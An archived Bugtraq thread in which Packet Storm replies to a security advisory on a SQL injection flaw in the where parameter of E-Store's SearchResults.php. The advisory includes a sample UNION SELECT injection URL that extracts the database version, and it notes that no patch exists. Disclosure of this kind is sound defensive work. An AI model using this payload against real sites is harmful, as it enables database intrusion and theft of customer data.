Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: E-Store SQL Injection Vulnerability

From: Packet Storm <bugtraq () packetstormsecurity org>
Date: Fri, 11 Dec 2009 23:06:41 -0500
Previously discovered:

http://packetstormsecurity.org/0812-exploits/estore-sql.txt 856a5dc9cba52e892cbb54bd2e1a0a82 getaphpsite e-store 
suffers from a remote SQL injection vulnerability in SearchResults.php. Authored By <a 
href="mailto:trt-turk[at]hotmail.com";>ZoRLu</a>

On Fri, Dec 11, 2009 at 05:50:54AM +0100, Salvatore Fresta aka Drosophila wrote:

E-Store SQL Injection Vulnerability

 Name              E-Store
 Vendor            http://www.getaphpsite.com

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2009-09-03

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 VI.   DISCLOSURE TIMELINE


I. ABOUT THE APPLICATION

E-Store is a commercial PHP e-commerce.


II. DESCRIPTION

This application presents a SQL Injection bug.


III. ANALYSIS

Summary:

 A) SQL Injection

A) SQL Injection

The GET where parameter  passed to SearchResults.php has not
properly sanitised. Because of the affected query, the Magic
Quotes GPC flag (php.in) may be on.


IV. SAMPLE CODE

http://site/path/SearchResults.php?SearchTerm=&where=ItemName UNION
ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23&ord1=ItemName&ord2=asc&search1=Go!


V. FIX

No patch.
Previous By Date Next
Previous By Thread Next

Current thread: